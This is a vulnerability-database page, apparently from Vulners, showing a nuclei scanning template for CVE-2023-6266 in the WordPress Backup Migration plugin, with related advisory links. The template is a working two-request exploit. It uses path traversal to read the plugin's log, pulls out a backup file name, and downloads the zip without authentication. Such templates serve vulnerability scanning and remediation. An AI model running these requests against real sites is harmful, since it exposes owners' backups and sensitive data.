Lucene search
K

WordPress Backup Migration <= 1.3.6 - Path Traversal

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

WordPress Backup Migration up to 1.3.6 allows unauthenticated path traversal to download backups with sensitive data.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-6266
11 Jan 202410:26
circl
CNNVD
WordPress Plugin Backup Migration Security Vulnerability
11 Jan 202400:00
cnnvd
CVE
CVE-2023-6266
11 Jan 202408:32
cve
Cvelist
CVE-2023-6266 Backup Migration <= 1.3.6 - Unauthenticated Arbitrary Backup Download to Sensitive Information Exposure
11 Jan 202408:32
cvelist
EUVD
EUVD-2023-58511
3 Oct 202520:07
euvd
NVD
CVE-2023-6266
11 Jan 202409:15
nvd
OSV
CVE-2023-6266
11 Jan 202409:15
osv
Patchstack
WordPress Backup Migration Plugin <= 1.3.6 is vulnerable to Sensitive Data Exposure
1 Dec 202300:00
patchstack
Prion
Path traversal
11 Jan 202409:15
prion
Positive Technologies
PT-2024-14919
11 Jan 202400:00
ptsecurity
Rows per page
id: CVE-2023-6266

info:
  name: WordPress Backup Migration <= 1.3.6 - Path Traversal
  author: riteshs4hu
  severity: high
  description: |
    WordPress Backup Migration plugin versions up to 1.3.6 contain a path traversal and file validation issue in handle_downloading function, letting unauthenticated attackers download backup files containing sensitive information.
  impact: |
    Attackers can download backup files with sensitive data, leading to data breaches and privacy violations.
  remediation: |
    Update to the latest version of the plugin, version 1.3.7 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/d8c3c04e-c0f9-4f7e-b7e5-3e3e3e3e3e3e
    - https://patchstack.com/database/vulnerability/backup-backup/wordpress-backup-migration-plugin-1-3-7-unauthenticated-arbitrary-backup-download-vulnerability
    - https://plugins.trac.wordpress.org/browser/backup-backup/tags/1.3.5/includes/initializer.php#L1048
    - https://plugins.trac.wordpress.org/browser/backup-backup/tags/1.3.5/includes/initializer.php#L972
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-6266
    cwe-id: CWE-552
    epss-score: 0.02072
    epss-percentile: 0.79178
    cpe: cpe:2.3:a:backupbliss:backup_migration:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: backupbliss
    product: backup_migration
    framework: wordpress
    shodan-query: http.html:"backup-migration"
    fofa-query: body="backup-migration"
  tags: cve,cve2023,wp,wp-plugin,wordpress,backupbliss,backup-migration,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /?backup-migration=BMI_BACKUP&backup-id=../complete_logs.log HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "BM_Backup")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: backupfile
        part: body
        regex:
          - 'BM_Backup_[0-9_-]+_[A-Za-z0-9]+\.zip'
        internal: true

  - raw:
      - |
        GET /?backup-migration=BMI_BACKUP&backup-id={{backupfile}} HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/zip")'
        condition: and
# digest: 4a0a00473045022100c0853d79ad133579232d27326e2c160e5ef10ec2fbdaf6f6b1d1f4036aee3ce902204899bf73cd5e8d07187fd9d46c13f815c351f8e78bab7f9a8207370fa742658d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation